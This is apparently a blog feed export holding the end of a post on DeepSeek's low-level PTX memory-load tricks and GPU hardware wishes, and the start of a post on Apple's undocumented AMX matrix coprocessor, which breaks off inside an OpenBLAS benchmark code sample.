<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740636794981/be99d507-d4af-4e1e-bb10-9cc76b97eedb.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740636644921/ed0abb20-7f55-4f0f-8490-94ce3b0e1f40.png" alt class="image--center mx-auto" /></p>
<p>But what is PTX? For those familiar with LLVM, PTX shares similarities with LLVM’s Intermediate Representation (IR). While LLVM’s project scope has expanded beyond its original “virtual machine” naming, its core concept of IR remains analogous to PTX. IR acts as a bridge between frontend programming languages and backend machine code, simplifying support for new languages and hardware targets while enabling cross-platform optimizations. PTX serves as NVIDIA’s "CUDA IR," connecting high-level CUDA C++ code with low-level GPU SASS instructions. This abstraction allows NVIDIA to implement runtime optimizations via tools like NVRTC and generate device-agnostic code.</p>
<p>Though CUDA developers may not directly interact with PTX, it plays a critical role under the hood. When compiling CUDA code with NVCC, <code>.ptx</code> files are generated during the device code compilation phase. These files represent the optimized intermediate code before final translation to SASS (the GPU’s native instruction set).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1738579948361/a4f6e1f0-f6b6-4ecf-a5ff-e9bef1e0ae4d.png" alt class="image--center mx-auto" /></p>
<p>Many people touted Deepseek’s use of PTX as gamechanging, but using PTX doesn’t necessarily mean that your code will automatically be supercharged. The modern NVCC compiler is so advanced that handwritten SASS code will likely have on par performance with handwritten PTX, except if you’re really good at writing it.</p>
<p>MoE models have unique communication patterns because they dynamically route tokens to different experts that may be distributed across multiple GPUs and nodes. This creates an intense all-to-all communication pattern that can become a performance bottleneck. This is further complicated by sanctions, where the interconnect speeds are severely nerfed in H800 cards.</p>
<div class="hn-table">
<table>
<thead>
<tr>
<td><strong>Specs</strong></td><td><strong>H100 SXM5</strong></td><td><strong>H800 SXM5</strong></td></tr>
</thead>
<tbody>
<tr>
<td>Double precision FP64</td><td>34 TFLOPS</td><td>1 TFLOPS</td></tr>
<tr>
<td>Double precision FP32</td><td>67 TFLOPS</td><td>1 TFLOPS</td></tr>
<tr>
<td>Single precision FP32</td><td>67 TFLOPS</td><td>67 TFLOPS</td></tr>
<tr>
<td>Memory Bandwidth</td><td>3.35TB/s</td><td>3.35TB/s</td></tr>
<tr>
<td>Interconnect Bandwidth</td><td>900 GB/s</td><td>400 GB/s</td></tr>
<tr>
<td>NVLink Link</td><td>18</td><td>8</td></tr>
</tbody>
</table>
</div><p>The <code>__ldg</code> intrinsic in CUDA <a target="_blank" href="https://forums.developer.nvidia.com/t/maxwell-sm-50-instruction-ldg-e/39123/4">maps to the PTX instruction</a> <code>ld.global.nc</code>, which loads data through the non-coherent texture cache path. This was originally introduced in the Kepler architecture to provide a higher bandwidth, <a target="_blank" href="https://forums.developer.nvidia.com/t/do-7-x-devices-have-a-readonly-constant-cache/220844">read-only path for accessing global memory</a>:</p>
<pre><code class="lang-c"><span class="hljs-comment">// Standard usage of __ldg</span>
<span class="hljs-keyword">template</span> &lt;<span class="hljs-keyword">typename</span> T&gt;
<span class="hljs-function">__device__ __forceinline__ T <span class="hljs-title">read_with_ldg</span><span class="hljs-params">(<span class="hljs-keyword">const</span> T* ptr)</span> </span>{
    <span class="hljs-keyword">return</span> __ldg(ptr);
}

<span class="hljs-comment">// Compiled to something like:</span>
<span class="hljs-comment">// ld.global.nc.f32 %f1, [%rd1];</span>
</code></pre>
<p>The texture cache has historically been optimized for spatially local access patterns and offers higher bandwidth than the standard L1/L2 cache path. However, it comes with a crucial limitation: by design, it is non-coherent with global memory stores. The NVIDIA programming guide explicitly warns that the texture cache isn't kept coherent with respect to global memory writes within the same kernel execution.The texture cache has historically been optimized for spatially local access patterns and offers higher bandwidth than the standard L1/L2 cache path. However, it comes with a crucial limitation: by design, it is non-coherent with global memory stores. The NVIDIA programming guide explicitly warns that the texture cache isn't kept coherent with respect to global memory writes within the same kernel execution.</p>
<p>When examining the actual kernel code in <code>internode.cu</code>, Deepseek needed to efficiently move data between GPUs in the form of hidden states and routing information.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// From the combine_token function, they need to read data sent by other GPUs</span>
<span class="hljs-keyword">auto</span> recv_fn = [&amp;](<span class="hljs-keyword">int</span> src_rdma_rank, <span class="hljs-keyword">int</span> slot_idx, <span class="hljs-keyword">int</span> hidden_int4_idx) -&gt; int4 {
    <span class="hljs-comment">// If using __ldg, this could be:</span>
    <span class="hljs-keyword">return</span> __ldg(<span class="hljs-keyword">reinterpret_cast</span>&lt;<span class="hljs-keyword">const</span> int4*&gt;(rdma_channel_data.recv_buffer(src_rdma_rank) + 
                                                slot_idx * num_bytes_per_rdma_token) + 
                                                hidden_int4_idx);
};
</code></pre>
<p>DeepSeek's initial attempt with <code>ldg</code> was problematic for their MoE communication patterns. The data being communicated between experts on different GPUs needs to be immediately visible, but the non-coherent nature of <code>ldg</code> meant that some reads could <a target="_blank" href="https://forums.developer.nvidia.com/t/improper-use-of-ldg-causes-illegal-memory-access/36577#:~:text=When%20you%20read,kernel%E2%80%9D%20holds%20true.">return stale data</a>, leading to incorrect computation results.</p>
<p>When the writer thread on GPU 1 executes <code>global_buffer[my_idx] = data</code>, it writes a value (42 in this example) to global memory. This write operation goes through the normal global memory access path, and the value is eventually updated in the device's global memory.</p>
<p>Meanwhile, on GPU 2, the reader thread tries to read this value using <code>__ldg(&amp;global_buffer[idx])</code>. The crucial point is that <code>__ldg</code> accesses memory through the texture cache, which is optimized for read-only data patterns. By design, the texture cache is not kept coherent with global memory writes from other threads or GPUs.</p>
<p>Even though the value has been updated in global memory, the reader's texture cache may still contain a stale value (0 in this example) from before the write occurred. The NVIDIA programming model doesn't guarantee that the texture cache will be automatically refreshed to see updates made by other threads or GPUs without explicit synchronization.</p>
<p>CUDA uses a relaxed memory model where, without explicit synchronization, threads may see writes from other threads in an order different from what was executed. For most operations, developers use mechanisms like <code>__syncthreads()</code>, atomic operations, or memory fences to establish proper ordering.</p>
<p>For inter-GPU communication, which is DeepSeek's use case, memory ordering becomes even more complex. They use NVSHMEM (NVIDIA's implementation of OpenSHMEM) for communication.</p>
<pre><code class="lang-cpp"><span class="hljs-comment">// Example of NVSHMEM put operation in internode.cu</span>
nvshmemx_int8_put_nbi_warp(rdma_channel_data.recv_buffer(rdma_rank) + rdma_slot_idx * num_bytes_per_rdma_token,
                           rdma_channel_data.send_buffer(dst_rdma_rank) + rdma_slot_idx * num_bytes_per_rdma_token,
                           num_bytes_per_rdma_token * num_chunked_tokens,
                           translate_dst_rdma_rank&lt;kLowLatencyMode&gt;(dst_rdma_rank, nvl_rank));
nvshmem_fence();
</code></pre>
<p>In this example, after this operation they need to read the data on the receiving GPU. If they use <code>__ldg</code> for these reads, they might get stale data from the texture cache even if the data has been properly transferred via NVSHMEM.</p>
<p>But DeepSeek discovered that using <code>ld.global.nc.L1::no_allocate.L2::256B</code> instead of the standard <code>ld.global.nc</code> instruction solves the coherency issue on Hopper architecture while maintaining performance benefits. Despite initially being called an “out-of-doc” instruction, this instruction is documented in NVIDIA's PTX ISA documentation.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740935064331/01578882-cc8f-47b4-8c9e-42a1007a183c.png" alt class="image--center mx-auto" /></p>
<p>The instruction's components:</p>
<ul>
<li><p><code>ld.global</code>: Loads data from the global memory space</p>
</li>
<li><p><code>.nc</code>: Uses a non-coherent cache for the load (typically the texture cache)</p>
</li>
<li><p><code>.L1::no_allocate</code>: Prevents the loaded data from being cached in L1 cache</p>
</li>
<li><p><code>.L2::256B</code>: Prefetches 256 bytes of data into the L2 cache</p>
</li>
</ul>
<pre><code class="lang-cpp"><span class="hljs-meta">#<span class="hljs-meta-keyword">ifndef</span> DISABLE_AGGRESSIVE_PTX_INSTRS</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> LD_NC_FUNC <span class="hljs-meta-string">"ld.global.nc.L1::no_allocate.L2::256B"</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">else</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> LD_NC_FUNC <span class="hljs-meta-string">"ld.volatile.global"</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span>

<span class="hljs-keyword">template</span> &lt;&gt;
<span class="hljs-function">__device__  __forceinline__ <span class="hljs-keyword">int</span> <span class="hljs-title">ld_nc_global</span><span class="hljs-params">(<span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> *ptr)</span> </span>{
    <span class="hljs-keyword">int</span> ret;
    <span class="hljs-function"><span class="hljs-keyword">asm</span> <span class="hljs-title">volatile</span><span class="hljs-params">(LD_NC_FUNC <span class="hljs-string">".s32 %0, [%1];"</span> : <span class="hljs-string">"=r"</span>(ret) : <span class="hljs-string">"l"</span>(ptr))</span></span>;
    <span class="hljs-keyword">return</span> ret;
}
</code></pre>
<p>The “undefined behavior” comes from using <code>ld.global.nc</code> to read volatile data. The <code>.nc</code> qualifier indicates that a non-coherent cache is used, which means the load operation might not see the most recent writes to the memory location. According to the PTX documentation, the texture cache (accessed via .nc) is designed for read-only data that doesn't change during a kernel's execution. Using it for volatile data (data that could be modified by other threads or processes) violates its intended use case.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740933986890/704b3ed2-c4f0-4a85-b584-92156e7a76e3.jpeg" alt class="image--center mx-auto" /></p>
<p>Using <code>.nc</code> alters the memory coherence behavior. By design, the non-coherent cache does not maintain coherence with other memory accesses. But the PTX memory model documentation loads via <code>.nc</code> (which uses the texture cache path) are not guaranteed to see updates made by normal global memory operations in a timely or consistent fashion. Within the same kernel execution, if one thread writes to a global memory address and another thread (or the same thread later) tries to read that address using <code>ld.global.nc</code>, the read might fetch a stale value from the non-coherent cache.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1740932907425/5fa187d3-5dd2-4e61-829a-f92e19a41704.jpeg" alt class="image--center mx-auto" /></p>
<p>The underlying reason is that global L1 caches (and the texture cache) are <a target="_blank" href="https://stackoverflow.com/questions/72758469/can-cuda-atomic-operations-use-l1-cache#:~:text=,loads%20cached%20in%20L1">not coherent with each other for global memory updates</a>. Official documentation notes that global memory is coherent at the L2 level only; multiple SMs’ L1 caches are not kept coherent for global data​. So if one SM writes to a location (bypassing or evicting from its L1) and another SM has that location cached in its texture/L1 cache, the second SM can read a stale cached value​. The driver/hardware will invalidate such caches only between kernel launches, not within a single kernel​.</p>
<p>But DeepSeek discovered that despite this violation, adding the <code>.L1::no_allocate</code> qualifier makes this work correctly on Hopper. Their hypothesis is that on Hopper, the non-coherent cache is unified with L1, and using <code>.L1::no_allocate</code> prevents any stale data from persisting in cache. By bypassing L1 cache, each load must fetch fresh data from either L2 cache or global memory.</p>
<p>This specialized instruction provides several significant performance advantages. The non-coherent cache typically offers higher bandwidth than the standard global memory cache path. The instruction also prefetches 256 bytes of data into the L2 cache, which significantly improves sequential access patterns. Furthermore, by avoiding L1 cache pollution for data that won't be reused, it preserves L1 cache capacity for other frequently accessed data.</p>
<h1 id="heading-where-deepseek-thinks-hardware-should-go">Where Deepseek Thinks Hardware Should Go</h1>
<p>When news of R1 went mainstream, the news put investors into panic mode. But the fact of the matter is, R1 represents Deepseek finding that NVIDIA hardware can still be pushed way further than what US and Chinese labs are pushing. But the fact of the matter is they will run out of chips, they will run out of clever tricks to do with their current hardware. And given the pace in which the Chinese semiconductor industry is moving, coupled with the pure chokehold that NVIDIA’s CUDA has on the AI/ML industry, without new hardware they’re gonna run out of tricks soon.</p>
<p>This is easily found in their own paper (which i will assume in good faith all of you have read in full, not only snippets from Twitter you put into your bookmarks to never revisit ever again).</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737923434733/1933eb4c-a296-4e8a-95ea-cc8b402cfc81.png" alt class="image--right mx-auto mr-0" /></p>
<p>But what are the “development of more advanced hardware” Deepseek is looking for?</p>
<h2 id="heading-higher-fp8-gemm-accumulation-precision">Higher FP8 GEMM Accumulation Precision</h2>
<p>DeepSeek V3's groundbreaking achievement is the first successful implementation of FP8 training at extreme scale (671B parameters), achieving a relative loss error below 0.25% compared to BF16 baselines. But currently, FP8 GEMM operations on NVIDIA H800 GPUs have limitations on accumulation precision to approximately 14 bits, significantly below FP32 precision. This becomes particularly problematic with large inner dimensions (K), common in large-scale model training where batch size and model width are increased. Their testing shows GEMM operations with K=4096 can result in maximum relative errors approaching 2% due to limited accumulation precision in Tensor Cores.</p>
<p>They propose future hardware should either support full-precision accumulation in Tensor Cores or implement an appropriate accumulation bit-width based on training and inference accuracy requirements, eliminating the need for frequent data movement between Tensor and CUDA cores.</p>
<h2 id="heading-tile-and-block-wise-quantization">Tile and Block-Wise Quantization</h2>
<p>DeepSeek's tile and block-wise quantization strategy directly addresses the primary challenge of FP8 training: managing outliers in activations and weights that can destabilize training due to FP8's limited dynamic range. Their innovation applies different quantization strategies for activations versus weights. For activations, they implement 1x128 tile-wise grouping (per token per 128 channels), while weights use 128x128 block-wise grouping (per 128 input/output channels). This granular approach allows better accommodation of outliers by adapting scaling factors to smaller groups of elements.</p>
<p>A key aspect of their implementation is the introduction of per-group scaling factors along the inner dimension of GEMM operations. While this functionality isn't directly supported in standard FP8 GEMM, they combine it with their precise FP32 accumulation strategy for efficient implementation. Their approach aligns with emerging hardware trends, as NVIDIA's next-generation Blackwell GPUs <a target="_blank" href="https://www.youtube.com/watch?v=1vKPj7SXkwU">will support microscaling formats</a> with smaller quantization granularity.</p>
<h2 id="heading-transposed-gemm-operations">Transposed GEMM Operations</h2>
<p>DeepSeek's current architecture faces inefficiencies in matrix transposition operations during training. During forward pass, activations are quantized into 1x128 FP8 tiles and stored. The backward pass requires reading out these matrices, dequantizing them, transposing them, re-quantizing into 128x1 tiles, and storing in HBM. This multi-step process creates significant memory operation overhead.</p>
<p>They propose enabling direct transposed reads of matrices from shared memory before MMA operations for precisions required in both training and inference. When combined with their proposed fusion of FP8 format conversion and TMA access, this would eliminate the current need for multiple memory operations and re-quantization steps. The optimization would be particularly impactful for their mixed-precision training framework where multiple matrix transformations are required between forward and backward passes.</p>
<h2 id="heading-dedicated-inter-gpu-link-co-processors">Dedicated Inter-GPU Link Co-Processors</h2>
<p>The need for specialized co-processors to handle inter-GPU communications arises from their current requirement to dedicate 20 out of 132 Streaming Multiprocessors (SMs) solely for communication tasks in their distributed MoE architecture. These SMs manage a complex communication system spanning InfiniBand for inter-node and NVLink for intra-node communication. This system, while effective, represents a 15% reduction in available computing power that could otherwise be used for model training.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737924821509/78633f1d-08db-4bff-85d3-2b64bd110349.png" alt class="image--center mx-auto" /></p>
<p>A specialized co-processor would unify these networking domains, similar to <a target="_blank" href="https://network.nvidia.com/pdf/solutions/hpc/paperieee_copyright.pdf">NVIDIA's Scalable Hierarchical Aggregation Protocol (SHARP)</a> which serves as a network co-processor (current inside certain Mellanox InfiniBand switches, yes, <strong>network switches</strong>).</p>
<p>Tthe co-processor could provide a unified interface for read, write, multicast, and reduce operations across the entire IB-NVLink-unified domain while maintaining near-zero all-to-all communication overhead. This would be particularly crucial for maintaining efficiency in their MoE architecture, where each token must be routed to up to 4 nodes without blocking subsequent token operations.</p>
<h1 id="heading-conclusions">Conclusions</h1>
<p>There has been alot that has been said about both sides of this discussion, China on the rise and the West has fallen. But almost all of the methods that Deepseek uses are built upon research done by Western teams, and trained on American technologies. If Deepseek used <a target="_blank" href="https://www.zhihu.com/question/596309547/answer/3184526430">Huawei Ascend chips</a>, I’d be singing a different tune.</p>
<p>I don’t understand why people thought this <a target="_blank" href="https://www.reuters.com/technology/chinas-deepseek-sets-off-ai-market-rout-2025-01-27/">punctured NVIDIA’s dominance</a>, PTX has an ISA documentation and some of the optimization methods are not entirely alien. People think hardware and compilers are now so fast that doing low-level optimizations is no longer worth it, when <a target="_blank" href="https://arxiv.org/pdf/1804.06826">we know this is not the case</a>.</p>
<p>People think that Deepseek somehow discovered PTX and now can bypass “NVIDIA’s CUDA Monopoly” when the PTX ISA is a domain-specific compiler IR, connecting high-level CUDA C++ code with low-level GPU SASS instructions. These low-level code optimizations are not interchangeable to AMD or even Huawei Ascend cards, as they run entirely different architectures. NVIDIA obscures their hardware's actual implementation details, even in absurd ways like how technical diagrams in <a target="_blank" href="https://images.nvidia.com/aem-dam/Solutions/geforce/blackwell/nvidia-rtx-blackwell-gpu-architecture.pdf">NVIDIA’s technical documents</a> only aim to explain the general structure of the architecture and may not accurately depict the exact implementation details of the hardware.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1738411150000/0be46a7c-a64c-47b3-a42b-2d154d509c47.png" alt class="image--center mx-auto" /></p>
<p>This is genius on NVIDIA’s part because that will either mean firms have to invest in low-level engineers that will have to dig through these GPUs in order to fully utilize them, or buy more chips. In scenario one, NVIDIA will waste precious time and resources of firms to hyper-optimize their code for NVIDIA’s stack which cements their vendor lock-in. In scenario two, NVIDIA gets more money from batch orders and win either way.</p>
<p>Most of the people talking about Deepseek on Twitter only saw the benchmarks or small snippets of the paper and jizz themselves seeing the LaTEX math formulas, pretending they even know a single word they’re being mentioned. Deepseek did what American teams didn’t, they don’t leave papers on bookmarks.</p>
<p>The conclusion is, less bookmarking and more reading, please.</p>
]]></content:encoded></item><item><title><![CDATA[The Elusive Apple Matrix Coprocessor (AMX)]]></title><description><![CDATA[Cover Illustration by ochxzuke

I was heading for a trip over the weekends where i would be far from my main workstation, and at this time i was looking to continue my current run of Persona 5 Royal on the PC. Recently with the launch of MacOS Sonoma...]]></description><link>https://research.meekolab.com/the-elusive-apple-matrix-coprocessor-amx</link><guid isPermaLink="true">https://research.meekolab.com/the-elusive-apple-matrix-coprocessor-amx</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Mon, 30 Dec 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1732452538868/6ee3bd61-0e7c-429e-a51e-72b0febfcb82.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by ochxzuke</em></strong></p>
</blockquote>
<p>I was heading for a trip over the weekends where i would be far from my main workstation, and at this time i was looking to continue my current run of Persona 5 Royal on the PC. Recently with the launch of MacOS Sonoma, Apple added support for the translation of AVX2 instructions through <a target="_blank" href="https://developer.apple.com/games/game-porting-toolkit/#:~:text=The%20latest%20version,Increased%20performance.">Game Porting Toolkit 2</a>.</p>
<p>But quickly i found that while there are translations for AVX2 instructions, they’re not very good. This is because many of the AVX2 instructions were mapped to ARM NEON equivalents, and as NEON has relatively limited and less flexible instruction set compared to its x86 counterparts like Intel’s AVX2. NEON lacks certain advanced operations, such as comprehensive shuffle and permutation instructions, which are readily available in AVX.</p>
<p>While Rosetta emulates other Intel SIMD technologies like SSE super fast, it skips over support for AVX because the <a target="_blank" href="https://patents.google.com/patent/US20140297991A1/en">patent for AVX</a> is still valid, which Intel is very eager to remind <a target="_blank" href="https://web.archive.org/web/20220405065430/https://newsroom.intel.com/editorials/x86-approaching-40-still-going-strong/#gs.elvle9:~:text=However%2C%20there%20have,10%20years%20ago.">its competitors about</a>. Emulating the Intel ISA without authorization will likely land Apple into legal trouble, which is why they would likely need to license the ISA in order to incorporate it to Rosetta.</p>
<p>This is why workarounds often involves translating one AVX instruction multi-step NEON instructions to achieve what AVX can accomplish with a single operation, creating bottlenecks in translation speeds. This is where i fell into a rabbit hole of ARM NEON performance in MacOS and also the mysterious Apple Matrix Extensions (AMX) coprocessor.</p>
<h1 id="heading-brief-history-of-amx">Brief history of AMX</h1>
<p>In 2019 at Apple’s Fall Keynote to introduce new iPads, Apple Watches, and iPhones, there was a brief 30 second moment where they went on-stage and introduced a new co-processor inside the A13 Bionic chip. What was vaguely called “Machine Learning Accelerators” added two SIMD units that performs accelerated matrix operation into the CPU, which Apple claimed to have increased the matrix multiplication power of A13 Bionic by 6 times and allowing the CPU to achieve one trillion operations per second.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1727019243431/7fe08870-a17f-4c00-ac64-a2190aaedc7d.png" alt class="image--center mx-auto" /></p>
<p>Many thought that this was an addition to the Apple Neural Engine (ANE) Accelerators previously introduced in the A11 Bionic, but it seemed like these dedicated accelerators are seperate from the ANE.</p>
<p>The Apple Matrix Coprocessor (AMX) operates as a specialized coprocessor that interfaces directly with the instruction stream rather than functioning as a discrete accelerator. Unlike traditional accelerators such as GPUs or Apple's Neural Engine, AMX implements instruction stream monitoring capabilities, allowing it to intercept and process specific matrix operations embedded within the standard instruction flow.</p>
<p>The AMX's implementation diverges from conventional accelerator designs by eliminating the need for explicit memory management and instruction queue population typically associated with GPU-style accelerators. This design choice significantly reduces operational overhead, particularly beneficial for smaller matrix computations where traditional accelerator setup costs would be prohibitive. The coprocessor achieves this efficiency by monitoring the instruction cache feed to the CPU cores, identifying and intercepting matrix-specific instructions for specialized processing.</p>
<p>From an instruction set architecture (ISA) perspective, the AMX represents a non-standard extension to ARM's base instruction set. This implementation required special dispensation from ARM Ltd., which historically restricted custom instruction set extensions until their 2019 policy revision. The AMX instructions are interleaved with standard ARM instructions but remain undocumented in official specifications, accessible primarily through Apple's Accelerate framework components including vImage, BLAS, BNNS, vDSP, and LAPACK.</p>
<p>Performance analysis conducted by <a target="_blank" href="https://web.archive.org/web/20230329074003/https://nod.ai/comparing-apple-m1-with-amx2-m1-with-neon/">Nod Labs</a> (now acquired by AMD) demonstrates that AMX achieves approximately twice the computational throughput compared to ARM's native NEON SIMD instructions for matrix operations. This performance differential is particularly significant for machine learning workloads and high-performance computing applications that heavily utilize matrix computations. The coprocessor's efficiency stems from its tight integration with the CPU's instruction pipeline, enabling lower-latency operation compared to discrete accelerators.</p>
<h1 id="heading-technicals">Technicals</h1>
<p>These cores are more commonly known as the AMX, which are undocumented arm64 ISA extensions present on Apple Silicon chips. In the M-series chips, the class of Apple Silicon processors for desktop use, the amount of AMX cores were bumped from 2 to 4. The existence of these instructions have been reversed by <a target="_blank" href="https://gist.github.com/dougallj/7a75a3be1ec69ca550e7c36dc75e0d6f">Dougal Johnson</a>.</p>
<p>Thanks to <a target="_blank" href="https://patents.google.com/patent/US20180074824A1/en">abandoned patent US20180074824A1</a> from Apple we can see that <a target="_blank" href="https://patents.google.com/patent/US20180074824A1/en">the AMX instructions operate</a> on a 32x32 grid of compute units. Each unit is capable of performing 16-bit multiply-accumulate operations. The architecture allows for flexibility in data width, as 2x2 subgrids of units can perform 32-bit multiply-accumulate operations, and 4x4 subgrids can handle 64-bit multiply-accumulate operations. To feed this computational grid, AMX utilizes a pool of X registers and a pool of Y registers. Each of these registers contains 32 16-bit elements, 16 32-bit elements, or 8 64-bit elements. This structure enables a single instruction to perform a full outer product operation, multiplying every element of an X register with every element of a Y register and accumulating the results with the corresponding Z element.</p>
<p><img src alt class="image--center mx-auto" /></p>
<p>The AMX architecture supports various data types for computation. It can handle IEEE754 floating-point numbers in f16, f32, or f64 formats, with the same width used for all three operands in fused-multiply-add operations. Additionally, it supports operations using f16 multiplicands while accumulating onto f32. Integer operations are also supported, with 8-bit or 16-bit multiplicands accumulating onto 16 or 32 bits in various signedness configurations. The M2 hardware introduced support for bfloat16 (bf16) multiplicands, which can accumulate onto either bf16 or IEEE754 f32.</p>
<p>While the A-series chips contained version 1 (marked by the existence of 7-bit writemasks), the M1 chip is believed to contain version 2 of the AMX instructions that contained 9-bit writemasks instead. The transition from M1 to M2 brought <code>bf16</code> support along with other minor adjustments. The M2 to M3 transition further expanded capabilities by adding an extra mode to each of the <code>ldx</code>, <code>ldy</code>, and <code>matint</code> instructions.</p>
<p>The AMX coprocessor's state comprises two 0x200 byte registers, amx0 ("x") and amx1 ("y"), and one 0x1000 byte register amx2 ("z"). Apple's documentation describes x, y, and z as register groups, with each 64-byte row considered a "register". The z register group is specifically described as "64 registers in an M-by-N matrix". Additionally, the AMX configuration happens at the level of the AMX_CONFIG_EL1/EL12/EL2/EL21 registers, with AMX_STATE_T_EL1 and AMX_CONTEXT_EL1 being also present.</p>
<p>AMX instructions follow a specific format:</p>
<pre><code class="lang-c"><span class="hljs-number">0x00201000</span> | ((op &amp; <span class="hljs-number">0x1F</span>) &lt;&lt; <span class="hljs-number">5</span>) | (operand &amp; <span class="hljs-number">0x1F</span>)
</code></pre>
<p>The coprocessor must be explicitly enabled using op=17, operand=0 and disabled using op=17, operand=1. In the Accelerate framework, these instructions are consistently prefixed by three NOPs. Executing non-enable instructions when AMX is disabled results in illegal instruction exceptions.</p>
<p>Most AMX operations (op=0-16 and op=18-22) use a 64-bit register number (X0-X30 or 31=XZR) as the operand. This register typically contains a bitfield with additional operation parameters. For instance, load and store operations use a 56-bit address in bits 0-55, a 5-bit register offset (in 0x40-byte units) in bits 56-61, and a flag in bit 62 (0 for 0x40-byte operations, 1 for 0x80-byte aligned operations).</p>
<p>The AMX instruction set includes various operations:</p>
<ol>
<li><p>Load/store operations (ops 0-7)</p>
</li>
<li><p>Extract and move operations (ops 8-9)</p>
</li>
<li><p>Floating-point multiply-add operations (ops 10-13, 15-16)</p>
</li>
<li><p>Integer multiply-add operations (op 14)</p>
</li>
<li><p>Vector and matrix operations (ops 18-21)</p>
</li>
<li><p>Lookup table generation (op 22)</p>
</li>
</ol>
<p>The AMX instruction set includes LDX/LDY for loading data, FMA for multiply-accumulate operations, and LDZ/SDZ for loading and storing results. The FMA instruction operates in two modes: Matrix Mode for outer product computations and Vector Mode for inner product calculations. The outer product mode offers higher hardware parallelism compared to the inner product mode.</p>
<p>The z register group occupies 0x1000 bytes (4096 bytes) of state. This larger group is divided into 64 registers, each also being 64 bytes wide. The z group is primarily used to store the results of operations performed on the x and y registers. This arrangement means that outer product results are not stored contiguously in registers, which has implications for how data is accessed and processed.</p>
<p>AMX's performance characteristics are noteworthy. It can achieve different levels of parallelism depending on how many Arithmetic Logic Units (ALUs) are enabled. Tests show that enabling all 4 ALUs can reach up to 2k GFLOP/s, demonstrating that ALUs can execute in parallel even when configured and emitted individually.</p>
<p>Load performance varies based on factors such as whether data is loaded into X and Y registers simultaneously, whether memory accesses are consecutive, and how many registers are used for reading. The highest bandwidth (219.201 GB/s) was achieved when loading 4 registers each from X and Y simultaneously with consecutive memory access.</p>
<p>Store performance is generally slower than compute and load operations, indicating that frequent loading and storing of Z registers should be avoided for optimal performance. The maximum bandwidth achieved for store operations was around 13 GB/s.</p>
<p>When designing kernels to leverage AMX, it's crucial to balance computation and data loading. One effective strategy involves loading 2 groups each of M and N data, allowing for 8 computation cycles that maximize ALU utilization. This approach allows for streaming computation, achieving near-peak performance.</p>
<p>Performance-wise, AMX functions as a non-speculative coprocessor, with operations posted via the CPU cores' store units. The M1 chip features two AMX coprocessors: one for the four Firestorm cores and another for the four Icestorm cores. Each coprocessor maintains four copies of the architectural register state, one per core. They access memory through the same L2 cache as the cores and operate at similar clock speeds.</p>
<p>The performance variant of AMX consists of an array of 4-cycle latency, pipelined FMAs, achieving a throughput of one FMA32 or FMA64 instruction per cycle, but only one FMA16 instruction every two cycles. The efficiency variant maintains the 4-cycle FMA32/FMA64 latency but performs one FMA32 or FMA64 instruction every four cycles, or one FMA16 instruction every eight cycles.</p>
<p>To achieve 1-cycle throughput from a single core, destinations must be independent (using a Z offset). Operations utilizing too much of the Z register will experience lower throughput. Throughput can be improved by distributing operations across different cores, thus leveraging entirely different Z registers.</p>
<h1 id="heading-performance-characteristics">Performance Characteristics</h1>
<p>We can compare the performance between SIMD operations performed by Arm NEON and Apple’s AMX by testing a few different strategies, first using OpenBLAS, then using Apple AMX directly, and through the official method using Apple’s Accelerate library. These tests were run in a Macbook Pro 14 inch with the M1 Pro chip and 16 GB of RAM.</p>
<h3 id="heading-openblas-arm-neon-performance">OpenBLAS (Arm NEON) Performance</h3>
<p>For a baseline comparison we can use the OpenBLAS, which is a repo of BLAS and LAPACK APIs with many optimizations for specific processor types, including Arm NEON and SVE (of note, Apple Silicon up to M3 haven’t supported the Arm SVE ISA as it still stuck with ARMv8 ISA).</p>
<pre><code class="lang-c"><span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> once</span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;cblas.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;vector&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-meta-keyword">include</span> <span class="hljs-meta-string">&lt;algorithm&gt;</span></span>

<span class="hljs-keyword">template</span> &lt;<span class="hljs-keyword">typename</span> T&gt;
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">OpenBLASGEMM</span> :</span> <span class="hljs-keyword">public</span> GEMM&lt;T&gt;
{
<span class="hljs-keyword">private</span>:
    <span class="hljs-keyword">size_t</span> n;
    <span class="hljs-built_in">std</span>::<span class="hljs-built_in">vector</span>&lt;T&gt; a, b, c;

<span class="hljs-keyword">public</span>:
    <span class="hljs-function"><span class="hljs-keyword">explicit</span> <span class="hljs-title">OpenBLASGEMM</span><span class="hljs-params">(<span class="hljs-keyword">size_t</span> n)</span> : <span class="hljs-title">n</span><span class="hljs-params">(n)</span>, <span class="hljs-title">a</span><span class="hljs-params">(n * n)</span>, <span class="hljs-title">b</span><span class="hljs-params">(n * n)</span>, <span class="hljs-title">c</span><span class="hljs-params">(n * n)</span> </span>{}

    <span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">run</span><span class="hljs-params">()</span> <span class="hljs-keyword">override</span>
    </span>{
